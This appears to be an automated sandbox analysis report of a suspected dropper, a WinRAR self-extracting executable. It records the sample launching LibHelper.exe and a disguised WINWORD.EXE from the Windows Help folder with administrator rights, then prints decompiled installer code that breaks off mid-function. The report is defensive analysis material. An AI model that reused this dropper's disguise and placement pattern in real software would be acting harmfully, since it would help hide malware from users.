GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer

gdiplus.dll

GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 9nZ3r5ZN45.exe PID: 6004 Parent PID: 5636

General

Start time:	01:16:55
Start date:	30/03/2021
Path:	C:\Users\user\Desktop\9nZ3r5ZN45.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\9nZ3r5ZN45.exe'
Imagebase:	0x830000
File size:	980255 bytes
MD5 hash:	910FE72C4F1BD5A451561F732D94A8B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: LibHelper.exe PID: 6076 Parent PID: 6004

General

Start time:	01:16:57
Start date:	30/03/2021
Path:	C:\Windows\Help\Windows\LibHelper.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Help\Windows\LibHelper.exe'
Imagebase:	0x1070000
File size:	173568 bytes
MD5 hash:	813B19969C3B67C6BB1369433142021A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 17%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: WINWORD.EXE PID: 5572 Parent PID: 6004

General

Start time:	01:16:57
Start date:	30/03/2021
Path:	C:\Windows\Help\Windows\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Help\Windows\WINWORD.EXE'
Imagebase:	0x2ff10000
File size:	1422168 bytes
MD5 hash:	15E52F52ED2B8ED122FAE897119687C4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 9nZ3r5ZN45.exe PID: 6004 Parent PID: 5636 9nZ3r5ZN45.exeCOMMON

Executed Functions

Function 0084CC0E, Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 199
filesleeptimeCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E0084CC0E(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a92, void* _a94, void* _a98, void* _a100, void* _a102, void* _a104, void* _a106, void* _a108, void* _a112, void* _a152, void* _a156, void* _a204) {
				char _v208;
				void* __ebx;
				void* __edi;
				void* _t41;
				void* _t42;
				long _t51;
				void* _t54;
				intOrPtr _t58;
				struct HWND__* _t74;
				void* _t75;
				WCHAR* _t95;
				struct HINSTANCE__* _t97;
				intOrPtr _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t125;

				_t125 = __fp0;
				_t89 = __edx;
				E0083FD60(__edx, 1);
				E0084966B("C:\Users\hardz\Desktop", 0x800);
				E00849B13( &_v208); // executed
				E0084103F(0x877370);
				_t74 = 0;
				E0084E920(0x7104, 0x885d08, 0, 0x7104);
				_t106 = _t105 + 0xc;
				_t95 = GetCommandLineW();
				_t110 = _t95;
				if(_t95 != 0) {
					_push(_t95);
					E0084B3B1(0, _t110);
					if( *0x879601 == 0) {
						E0084C8E7(__eflags, _t95); // executed
					} else {
						_t103 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
						if(_t103 != 0) {
							UnmapViewOfFile(_t75);
							_t74 = 0;
						}
						CloseHandle(_t103);
					}
				}
				GetModuleFileNameW(_t74, 0x88ce18, 0x800);
				SetEnvironmentVariableW(L"sfxname", 0x88ce18);
				GetLocalTime(_t106 + 0xc);
				_push( *(_t106 + 0x1a) & 0x0000ffff);
				_push( *(_t106 + 0x1c) & 0x0000ffff);
				_push( *(_t106 + 0x1e) & 0x0000ffff);
				_push( *(_t106 + 0x20) & 0x0000ffff);
				_push( *(_t106 + 0x22) & 0x0000ffff);
				_push( *(_t106 + 0x22) & 0x0000ffff);
				E00833F53(_t106 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t106 + 0x24) & 0x0000ffff);
				_t107 = _t106 + 0x28;
				SetEnvironmentVariableW(L"sfxstime", _t107 + 0x7c);
				_t97 = GetModuleHandleW(_t74);
				 *0x870064 = _t97;
				 *0x870060 = _t97; // executed
				_t41 = LoadIconW(_t97, 0x64); // executed
				 *0x87b704 = _t41; // executed
				_t42 = E0084A553(_t89, _t125); // executed
				 *0x885d04 = _t42;
				E0083CFF4(0x870078, _t89, 0x88ce18);
				E0084846F(0);
				E0084846F(0);
				 *0x8775dc = _t107 + 0x5c;
				 *0x8775e0 = _t107 + 0x30; // executed
				DialogBoxParamW(_t97, L"STARTDLG", _t74, E0084A62C, _t74); // executed
				 *0x8775e0 = _t74;
				 *0x8775dc = _t74;
				E00848521(_t107 + 0x24);
				E00848521(_t107 + 0x50);
				_t51 =  *0x88de28;
				if(_t51 != 0) {
					Sleep(_t51);
				}
				if( *0x8785f8 != 0) {
					E00849D14(0x88ce18);
				}
				E0083E7CD(0x885c00);
				if( *0x8775d8 > 0) {
					L00852BAE( *0x8775d4);
				}
				DeleteObject( *0x87b704);
				_t54 =  *0x885d04;
				if(_t54 != 0) {
					DeleteObject(_t54);
				}
				if( *0x8700e0 == 0 &&  *0x8775cc != 0) {
					E00836F18(0x8700e0, 0xff);
				}
				_t55 =  *0x88de2c;
				 *0x8775cc = 1;
				if( *0x88de2c != 0) {
					E0084C946(_t55);
					CloseHandle( *0x88de2c);
				}
				_t99 =  *0x8700e0; // 0x0
				if( *0x88de21 != 0) {
					_t58 =  *0x86d5fc; // 0x3e8
					if( *0x88de22 == 0) {
						__eflags = _t58;
						if(_t58 < 0) {
							_t99 = _t99 - _t58;
							__eflags = _t99;
						}
					} else {
						_t99 =  *0x88de24;
						if(_t58 > 0) {
							_t99 = _t99 + _t58;
						}
					}
				}
				E00849B7B(_t107 + 0x1c); // executed
				return _t99;
			}

0x0084cc0e
0x0084cc0e
0x0084cc19
0x0084cc28
0x0084cc31
0x0084cc3b
0x0084cc45
0x0084cc4e
0x0084cc53
0x0084cc5c
0x0084cc5e
0x0084cc60
0x0084cc62
0x0084cc63
0x0084cc6e
0x0084ccdb
0x0084cc70
0x0084cc83
0x0084cc87
0x0084ccc8
0x0084ccce
0x0084ccce
0x0084ccd1
0x0084ccd7
0x0084cc6e
0x0084ccec
0x0084ccfe
0x0084cd05
0x0084cd10
0x0084cd16
0x0084cd1c
0x0084cd22
0x0084cd28
0x0084cd2e
0x0084cd44
0x0084cd49
0x0084cd56
0x0084cd5f
0x0084cd64
0x0084cd6a
0x0084cd70
0x0084cd76
0x0084cd7b
0x0084cd86
0x0084cd8b
0x0084cd94
0x0084cd9d
0x0084cdad
0x0084cdbc
0x0084cdc1
0x0084cdcb
0x0084cdd1
0x0084cdd7
0x0084cde0
0x0084cde5
0x0084cdec
0x0084cdef
0x0084cdef
0x0084cdfc
0x0084cdfe
0x0084cdfe
0x0084ce08
0x0084ce14
0x0084ce1c
0x0084ce21
0x0084ce2e
0x0084ce30
0x0084ce37
0x0084ce3a
0x0084ce3a
0x0084ce43
0x0084ce58
0x0084ce58
0x0084ce5d
0x0084ce62
0x0084ce6b
0x0084ce6e
0x0084ce79
0x0084ce79
0x0084ce86
0x0084ce8c
0x0084ce95
0x0084ce9a
0x0084ceaa
0x0084ceac
0x0084ceae
0x0084ceae
0x0084ceae
0x0084ce9c
0x0084ce9c
0x0084cea4
0x0084cea6
0x0084cea6
0x0084cea4
0x0084ce9a
0x0084ceb4
0x0084cec4

APIs

Part of subcall function 0083FD60: GetModuleHandleW.KERNEL32 ref: 0083FD78
Part of subcall function 0083FD60: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0083FD90
Part of subcall function 0083FD60: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0083FDB3

Part of subcall function 0084966B: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00849673

Part of subcall function 00849B13: OleInitialize.OLE32(00000000), ref: 00849B2C
Part of subcall function 00849B13: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00849B63
Part of subcall function 00849B13: SHGetMalloc.SHELL32(008775C0), ref: 00849B6D

Part of subcall function 0084103F: GetCPInfo.KERNEL32(00000000,?), ref: 00841050
Part of subcall function 0084103F: IsDBCSLeadByte.KERNEL32(00000000), ref: 00841064

GetCommandLineW.KERNEL32 ref: 0084CC56
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0084CC7D
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0084CC8E
UnmapViewOfFile.KERNEL32(00000000), ref: 0084CCC8

Part of subcall function 0084C8E7: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0084C8FD
Part of subcall function 0084C8E7: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0084C939

CloseHandle.KERNEL32(00000000), ref: 0084CCD1
GetModuleFileNameW.KERNEL32(00000000,0088CE18,00000800), ref: 0084CCEC
SetEnvironmentVariableW.KERNEL32(sfxname,0088CE18), ref: 0084CCFE
GetLocalTime.KERNEL32(?), ref: 0084CD05
_swprintf.LIBCMT ref: 0084CD44
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0084CD56
GetModuleHandleW.KERNEL32(00000000), ref: 0084CD59
LoadIconW.USER32(00000000,00000064), ref: 0084CD70
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001A62C,00000000), ref: 0084CDC1
Sleep.KERNEL32(?), ref: 0084CDEF
DeleteObject.GDI32 ref: 0084CE2E
DeleteObject.GDI32(?), ref: 0084CE3A
CloseHandle.KERNEL32 ref: 0084CE79

Strings

winrarsfxmappingfile.tmp, xrefs: 0084CC71
sfxname, xrefs: 0084CCF9
C:\Users\user\Desktop, xrefs: 0084CC23
0Z, xrefs: 0084CD81
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0084CD35
STARTDLG, xrefs: 0084CDB6
sfxstime, xrefs: 0084CD51

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$0Z$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 788466649-4125274049
Opcode ID: 49bb301e72389fbde9d9efa76d803289a451626bf640dd29671d951360592abd
Instruction ID: e0fee3f5639d3a23a2842e76bea331d67fe812ea4a832800b61554b6c378c90f
Opcode Fuzzy Hash: 49bb301e72389fbde9d9efa76d803289a451626bf640dd29671d951360592abd
Instruction Fuzzy Hash: C861D871904708AFD320FBA9EC49F2B3BACFB55750F014025F949E62A1DBB8D944CB62

Uniqueness

Uniqueness Score: -1.00%

Function 008496AD, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 92
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E008496AD(WCHAR* _a4) {
				WCHAR* _v4;
				intOrPtr _v8;
				intOrPtr* _v16;
				char _v20;
				void* __ecx;
				struct HRSRC__* _t14;
				WCHAR* _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t26;
				char* _t30;
				long _t32;
				void* _t34;
				intOrPtr* _t35;
				void* _t40;
				struct HRSRC__* _t42;
				intOrPtr* _t44;

				_t14 = FindResourceW( *0x870060, _a4, "PNG"); // executed
				_t42 = _t14;
				if(_t42 == 0) {
					return _t14;
				}
				_t32 = SizeofResource( *0x870060, _t42);
				if(_t32 == 0) {
					L4:
					_t16 = 0;
					L16:
					return _t16;
				}
				_t17 = LoadResource( *0x870060, _t42);
				if(_t17 == 0) {
					goto L4;
				}
				_t18 = LockResource(_t17);
				_t43 = _t18;
				if(_t18 != 0) {
					_v4 = 0;
					_t19 = GlobalAlloc(2, _t32); // executed
					_t40 = _t19;
					if(_t40 == 0) {
						L15:
						_t16 = _v4;
						goto L16;
					}
					if(GlobalLock(_t40) == 0) {
						L14:
						GlobalFree(_t40);
						goto L15;
					}
					E0084EA80(_t20, _t43, _t32);
					_a4 = 0;
					_push( &_a4);
					_push(0);
					_push(_t40);
					if( *0x86dff8() == 0) {
						_t26 = E00849642(_t24, _t34, _v8, 0); // executed
						_t35 = _v16;
						_t44 = _t26;
						 *((intOrPtr*)( *_t35 + 8))(_t35);
						if(_t44 != 0) {
							 *((intOrPtr*)(_t44 + 8)) = 0;
							if( *((intOrPtr*)(_t44 + 8)) == 0) {
								_push(0xffffff);
								_t30 =  &_v20;
								_push(_t30);
								_push( *((intOrPtr*)(_t44 + 4)));
								L0084D86E(); // executed
								if(_t30 != 0) {
									 *((intOrPtr*)(_t44 + 8)) = _t30;
								}
							}
							 *((intOrPtr*)( *_t44))(1);
						}
					}
					GlobalUnlock(_t40);
					goto L14;
				}
				goto L4;
			}

0x008496be
0x008496c4
0x008496c8
0x008497a5
0x008497a5
0x008496dc
0x008496e0
0x00849700
0x00849700
0x008497a2
0x00000000
0x008497a2
0x008496e9
0x008496f1
0x00000000
0x00000000
0x008496f4
0x008496fa
0x008496fe
0x0084970e
0x00849712
0x00849718
0x0084971c
0x0084979c
0x0084979c
0x00000000
0x008497a1
0x00849727
0x00849795
0x00849796
0x00000000
0x00849796
0x0084972c
0x00849734
0x0084973c
0x0084973d
0x0084973e
0x00849747
0x0084974e
0x00849753
0x00849757
0x0084975c
0x00849761
0x00849766
0x0084976b
0x0084976d
0x00849772
0x00849776
0x00849777
0x0084977a
0x00849781
0x00849783
0x00849783
0x00849781
0x0084978c
0x0084978c
0x00849761
0x0084978f
0x00000000
0x0084978f
0x00000000

APIs

FindResourceW.KERNELBASE(00000066,PNG,?,?,0084A5A5,00000066), ref: 008496BE
SizeofResource.KERNEL32(00000000,75085B70,?,?,0084A5A5,00000066), ref: 008496D6
LoadResource.KERNEL32(00000000,?,?,0084A5A5,00000066), ref: 008496E9
LockResource.KERNEL32(00000000,?,?,0084A5A5,00000066), ref: 008496F4
GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,0084A5A5,00000066), ref: 00849712
GlobalLock.KERNEL32 ref: 0084971F
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0084977A
GlobalUnlock.KERNEL32(00000000), ref: 0084978F
GlobalFree.KERNEL32 ref: 00849796

Strings

PNG, xrefs: 008496AF

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
String ID: PNG
API String ID: 4097654274-364855578
Opcode ID: 14b6618e86550e66f229909589355d45c6332be6042d0551810c597e9da52c57
Instruction ID: 2ccf323ccdbbb48b3eb838f090c972c40ce1602797078623c1f9cbfb20a8703d
Opcode Fuzzy Hash: 14b6618e86550e66f229909589355d45c6332be6042d0551810c597e9da52c57
Instruction Fuzzy Hash: D821917160570AAFC7319F21DC88A2B7FA9FF86794B060528F985C2260EB71DC40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0083A383, Relevance: 7.6, APIs: 5, Instructions: 108
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0083A383(void* __edx, intOrPtr _a4, intOrPtr _a8, char _a32, short _a592, void* _a4692, WCHAR* _a4696, intOrPtr _a4700) {
				struct _WIN32_FIND_DATAW _v0;
				char _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _t43;
				signed int _t49;
				signed int _t63;
				void* _t65;
				long _t68;
				char _t69;
				void* _t73;
				void* _t82;
				intOrPtr _t84;
				void* _t87;
				signed int _t89;
				void* _t90;

				_t82 = __edx;
				E0084D9C0();
				_push(_t89);
				_t87 = _a4692;
				_t84 = _a4700;
				_t90 = _t89 | 0xffffffff;
				_push( &_v0);
				if(_t87 != _t90) {
					_t43 = FindNextFileW(_t87, ??);
					__eflags = _t43;
					if(_t43 == 0) {
						_t87 = _t90;
						_t63 = GetLastError();
						__eflags = _t63 - 0x12;
						_t11 = _t63 != 0x12;
						__eflags = _t11;
						 *((char*)(_t84 + 0x1044)) = _t63 & 0xffffff00 | _t11;
					}
					__eflags = _t87 - _t90;
					if(_t87 != _t90) {
						goto L13;
					}
				} else {
					_t65 = FindFirstFileW(_a4696, ??); // executed
					_t87 = _t65;
					if(_t87 != _t90) {
						L13:
						E0083FAE7(_t84, _a4696, 0x800);
						_push(0x800);
						E0083BA56(__eflags, _t84,  &_a32);
						_t49 = 0 + _a8;
						__eflags = _t49;
						 *(_t84 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *((intOrPtr*)(_t84 + 0x1008)) = _v24;
						 *((intOrPtr*)(_t84 + 0x1028)) = _v20;
						 *((intOrPtr*)(_t84 + 0x102c)) = _v16;
						 *((intOrPtr*)(_t84 + 0x1030)) = _v12;
						 *((intOrPtr*)(_t84 + 0x1034)) = _v8;
						 *((intOrPtr*)(_t84 + 0x1038)) = _v4;
						 *(_t84 + 0x103c) = _v0.dwFileAttributes;
						 *((intOrPtr*)(_t84 + 0x1004)) = _a4;
						E00840AA9(_t84 + 0x1010, _t82,  &_v4);
						E00840AA9(_t84 + 0x1018, _t82,  &_v24);
						E00840AA9(_t84 + 0x1020, _t82,  &_v20);
					} else {
						if(E0083B3C9(_a4696,  &_a592, 0x800) == 0) {
							L4:
							_t68 = GetLastError();
							if(_t68 == 2 || _t68 == 3 || _t68 == 0x12) {
								_t69 = 0;
								__eflags = 0;
							} else {
								_t69 = 1;
							}
							 *((char*)(_t84 + 0x1044)) = _t69;
						} else {
							_t73 = FindFirstFileW( &_a592,  &_v0); // executed
							_t87 = _t73;
							if(_t87 != _t90) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t84 + 0x1040) =  *(_t84 + 0x1040) & 0x00000000;
				return _t87;
			}

0x0083a383
0x0083a388
0x0083a38e
0x0083a390
0x0083a39c
0x0083a3a3
0x0083a3a6
0x0083a3a9
0x0083a41e
0x0083a424
0x0083a426
0x0083a428
0x0083a42a
0x0083a430
0x0083a433
0x0083a433
0x0083a436
0x0083a436
0x0083a43c
0x0083a43e
0x00000000
0x00000000
0x0083a3ab
0x0083a3b8
0x0083a3ba
0x0083a3be
0x0083a444
0x0083a452
0x0083a457
0x0083a45e
0x0083a469
0x0083a469
0x0083a46d
0x0083a477
0x0083a47a
0x0083a484
0x0083a48e
0x0083a498
0x0083a4a2
0x0083a4ac
0x0083a4b6
0x0083a4c0
0x0083a4cd
0x0083a4dd
0x0083a4ed
0x0083a3c4
0x0083a3df
0x0083a3f6
0x0083a3f6
0x0083a3ff
0x0083a410
0x0083a410
0x0083a40b
0x0083a40d
0x0083a40d
0x0083a412
0x0083a3e1
0x0083a3ee
0x0083a3f0
0x0083a3f4
0x00000000
0x00000000
0x00000000
0x00000000
0x0083a3f4
0x0083a3df
0x0083a3be
0x0083a4f2
0x0083a505

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0083A27E,000000FF,?,?), ref: 0083A3B8
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0083A27E,000000FF,?,?), ref: 0083A3EE
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0083A27E,000000FF,?,?), ref: 0083A3F6
FindNextFileW.KERNEL32(?,?,?,?,?,?,0083A27E,000000FF,?,?), ref: 0083A41E
GetLastError.KERNEL32(?,?,?,?,0083A27E,000000FF,?,?), ref: 0083A42A

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: f54a9e26e1c44fb1996816450039fb994ad35f9575a670a7e3921d2d6aecfaf6
Instruction ID: cdb6eb7d840fde7a98fa2fde81f2ea1e85180c50ce32d1b1b8848ac8802df092
Opcode Fuzzy Hash: f54a9e26e1c44fb1996816450039fb994ad35f9575a670a7e3921d2d6aecfaf6
Instruction Fuzzy Hash: 09416271608745AFC328DF68C884ADAF7E8FF88350F004A2AF5E9D3241D774A9548B96

Uniqueness

Uniqueness Score: -1.00%

Function 00856B19, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00856B19(int _a4) {
				void* _t14;
				void* _t16;

				if(E00859DC9(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00856B9E(_t14, _t16, _a4);
				ExitProcess(_a4);
			}

0x00856b25
0x00856b41
0x00856b41
0x00856b4a
0x00856b53

APIs

GetCurrentProcess.KERNEL32(?,?,00856AEF,?,0086A8C8,0000000C,00856C46,?,00000002,00000000), ref: 00856B3A
TerminateProcess.KERNEL32(00000000,?,00856AEF,?,0086A8C8,0000000C,00856C46,?,00000002,00000000), ref: 00856B41
ExitProcess.KERNEL32 ref: 00856B53

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 09a11738f8763f007c78f5cc2c65a186a5afb6f58d74bc4b029d45a6584928fd
Instruction ID: b9d8a57e3687c33be56fdb56e56b4a03f090eb534d82d75eb77e0e4ea2bd7f98
Opcode Fuzzy Hash: 09a11738f8763f007c78f5cc2c65a186a5afb6f58d74bc4b029d45a6584928fd
Instruction Fuzzy Hash: 3AE04635000A08EBCF016F28CD08E583B2AFF003A2F414060FD05CB121DB76EC66CA92

Uniqueness

Uniqueness Score: -1.00%

Function 00838458, Relevance: 3.9, APIs: 2, Instructions: 940
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E00838458(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t370;
				signed int _t374;
				signed int _t375;
				signed int _t380;
				signed int _t385;
				void* _t387;
				signed int _t388;
				signed int _t392;
				signed int _t393;
				signed int _t398;
				signed int _t403;
				signed int _t404;
				signed int _t408;
				signed int _t418;
				signed int _t419;
				signed int _t422;
				signed int _t423;
				signed int _t432;
				char _t434;
				char _t436;
				signed int _t437;
				signed int _t438;
				signed int _t460;
				signed int _t469;
				intOrPtr _t472;
				char _t479;
				signed int _t480;
				void* _t491;
				void* _t499;
				void* _t501;
				signed int _t511;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t520;
				signed int _t523;
				signed int _t531;
				signed int _t541;
				signed int _t543;
				signed int _t545;
				signed int _t547;
				signed char _t548;
				signed int _t551;
				void* _t556;
				signed int _t564;
				intOrPtr* _t574;
				signed int _t577;
				signed int _t586;
				intOrPtr _t589;
				signed int _t592;
				signed int _t601;
				signed int _t608;
				signed int _t610;
				signed int _t611;
				signed int _t613;
				signed int _t631;
				signed int _t632;
				void* _t639;
				void* _t640;
				signed int _t656;
				signed int _t667;
				intOrPtr _t668;
				void* _t670;
				signed int _t671;
				signed int _t672;
				signed int _t673;
				signed int _t674;
				signed int _t675;
				signed int _t681;
				intOrPtr _t683;
				signed int _t688;
				intOrPtr _t690;
				signed int _t692;
				signed int _t696;
				void* _t698;
				signed int _t699;
				signed int _t702;
				signed int _t703;
				void* _t706;
				void* _t708;
				void* _t710;

				E0084D8C4(E00861376, __ecx);
				E0084D9C0();
				_t574 =  *((intOrPtr*)(_t706 + 8));
				_t665 = 0;
				_t683 = __ecx;
				 *((intOrPtr*)(_t706 - 0x20)) = __ecx;
				_t370 =  *( *((intOrPtr*)(__ecx + 8)) + 0x82f2) & 0x0000ffff;
				 *(_t706 - 0x18) = _t370;
				if( *(_t706 + 0xc) != 0) {
					L6:
					_t690 =  *((intOrPtr*)(_t574 + 0x21dc));
					__eflags = _t690 - 2;
					if(_t690 == 2) {
						 *(_t683 + 0x10f5) = _t665;
						__eflags =  *(_t574 + 0x32dc) - _t665;
						if(__eflags > 0) {
							L22:
							__eflags =  *(_t574 + 0x32e4) - _t665;
							if(__eflags > 0) {
								L26:
								_t577 =  *(_t683 + 8);
								__eflags =  *((intOrPtr*)(_t577 + 0x615c)) - _t665;
								if( *((intOrPtr*)(_t577 + 0x615c)) != _t665) {
									L29:
									 *(_t706 - 0x11) = _t665;
									_t35 = _t706 - 0x51a8; // -18856
									_t36 = _t706 - 0x11; // 0x7ef
									_t374 = E00835D90(_t577, _t574 + 0x2280, _t36, 6, _t665, _t35, 0x800);
									__eflags = _t374;
									_t375 = _t374 & 0xffffff00 | _t374 != 0x00000000;
									 *(_t706 - 0x10) = _t375;
									__eflags = _t375;
									if(_t375 != 0) {
										__eflags =  *(_t706 - 0x11);
										if( *(_t706 - 0x11) == 0) {
											__eflags = 0;
											 *((char*)(_t683 + 0xf1)) = 0;
										}
									}
									E00832006(_t574);
									_push(0x800);
									_t43 = _t706 - 0x113c; // -2364
									_push(_t574 + 0x22a8);
									E0083B040();
									__eflags =  *((char*)(_t574 + 0x3373));
									 *(_t706 - 0x1c) = 1;
									if( *((char*)(_t574 + 0x3373)) == 0) {
										_t380 = E008320F0(_t574);
										__eflags = _t380;
										if(_t380 == 0) {
											_t548 =  *(_t683 + 8);
											__eflags = 1 -  *((intOrPtr*)(_t548 + 0x72bc));
											asm("sbb al, al");
											_t61 = _t706 - 0x10;
											 *_t61 =  *(_t706 - 0x10) &  !_t548;
											__eflags =  *_t61;
										}
									} else {
										_t551 =  *( *(_t683 + 8) + 0x72bc);
										__eflags = _t551 - 1;
										if(_t551 != 1) {
											__eflags =  *(_t706 - 0x11);
											if( *(_t706 - 0x11) == 0) {
												__eflags = _t551;
												 *(_t706 - 0x10) =  *(_t706 - 0x10) & (_t551 & 0xffffff00 | _t551 == 0x00000000) - 0x00000001;
												_push(0);
												_t54 = _t706 - 0x113c; // -2364
												_t556 = E0083B98F(_t54);
												_t656 =  *(_t683 + 8);
												__eflags =  *((intOrPtr*)(_t656 + 0x72bc)) - 1 - _t556;
												if( *((intOrPtr*)(_t656 + 0x72bc)) - 1 != _t556) {
													 *(_t706 - 0x10) = 0;
												} else {
													_t57 = _t706 - 0x113c; // -2364
													_push(1);
													E0083B98F(_t57);
												}
											}
										}
									}
									 *((char*)(_t683 + 0x5f)) =  *((intOrPtr*)(_t574 + 0x3319));
									 *((char*)(_t683 + 0x60)) = 0;
									asm("sbb eax, [ebx+0x32dc]");
									 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca8)) -  *(_t574 + 0x32d8),  *((intOrPtr*)(_t574 + 0x6cac)), 0);
									_t667 = 0;
									_t385 = 0;
